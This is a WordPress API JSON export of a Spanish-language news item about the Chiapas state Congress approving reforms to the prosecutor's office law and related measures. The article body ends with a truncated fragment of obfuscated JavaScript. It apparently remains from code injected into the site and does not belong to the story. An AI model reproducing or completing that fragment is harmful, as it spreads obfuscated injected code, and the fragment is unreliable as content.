{"id":6212,"date":"2022-10-28T01:20:08","date_gmt":"2022-10-28T01:20:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6212"},"modified":"2022-10-28T01:20:08","modified_gmt":"2022-10-28T01:20:08","slug":"aprueban-reformas-a-la-ley-organica-de-la-fiscalia-general-del-estado-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6212","title":{"rendered":"Aprueban reformas a la Ley Org\u00e1nica de la Fiscal\u00eda General del Estado de Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0048-1024x682.jpg\" alt=\"\" class=\"wp-image-6213\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0048-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0048-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0048-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0048-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0048.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas; 27 de octubre de 2022.- El pleno de la Sexag\u00e9sima Octava Legislatura del Congreso del Estado aprob\u00f3 el dictamen que present\u00f3 la Comisi\u00f3n de Justicia, relativo a la iniciativa de Decreto por el que se reforman, adicionan y derogan diversas disposiciones de la Ley Org\u00e1nica de la Fiscal\u00eda General del Estado de Chiapas.<\/p>\n\n\n\n<p>En la sesi\u00f3n presidida por la diputada Sonia Catalina \u00c1lvarez tambi\u00e9n se dio lectura y aprob\u00f3 el dictamen que present\u00f3 la Comisi\u00f3n de Educaci\u00f3n y Cultura, relativo al Punto de Acuerdo por el que la Sexag\u00e9sima Octava Legislatura, exhorta respetuosamente a los ayuntamientos, que no han nombrado a su cronista municipal, lo realicen de conformidad con los art\u00edculos 45, fracci\u00f3n XXXV. 77 fracci\u00f3n VIII, 88, 89 y 90 de la ley de Desarrollo Constitucional en materia de gobierno y administraci\u00f3n municipal del estado de Chiapas.<\/p>\n\n\n\n<p>Para manifestar su postura a favor de la Iniciativa abord\u00f3 tribuna la diputada Mar\u00eda Reyes Diego G\u00f3mez quien sostuvo ante sus hom\u00f3logos que dicho dictamen pretende impulsar la figura del cronista en los ayuntamientos municipales, siendo un personaje sustancial para la preservaci\u00f3n de la memoria de los pueblos y m\u00e1s a\u00fan para otorgar a las generaciones venideras la informaci\u00f3n la historia y la cultura que tanto nos caracteriza, as\u00ed como para fortalecer en la sociedad el sentido de pertenencia y el orgullo de sentirnos chiapanecos.<\/p>\n\n\n\n<p>M\u00e1s adelante se dio lectura de la iniciativa de decreto por el que se reforma el numeral 2, del art\u00edculo 2 de la Ley Org\u00e1nica del Congreso del Estado de Chiapas, presentada por los diputados Aar\u00f3n Yamil Melgar Bravo, Coordinador del Partido Morena; Sergio David Molina G\u00f3mez, Coordinador del Partido Verde Ecologista de M\u00e9xico; Carlos Morelos Rodr\u00edguez, Coordinador del Partido del Trabajo; Carolina Zuarth Ramos, Coordinadora del Partido Chiapas Unido; Elizabeth Escobedo Morales, Coordinadora del Partido Podemos Mover a Chiapas; Rub\u00e9n Antonio Zuarth Esquinca, Coordinador del Partido Revolucionario Institucional; y Leticia Albores Ru\u00edz, Coordinadora del Partido Redes Sociales Progresistas; mismo que se turn\u00f3 a la Comisi\u00f3n de Gobernaci\u00f3n y Puntos Constitucionales para el dictamen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas; 27 de octubre de 2022.- El pleno de la Sexag\u00e9sima Octava Legislatura del Congreso del Estado aprob\u00f3 el dictamen que present\u00f3 la Comisi\u00f3n de Justicia, relativo a la iniciativa de Decreto por el que se reforman, adicionan y derogan diversas disposiciones de la Ley Org\u00e1nica de la Fiscal\u00eda General del Estado de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6213,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-6212","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6212"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6212\/revisions"}],"predecessor-version":[{"id":6214,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6212\/revisions\/6214"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6213"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}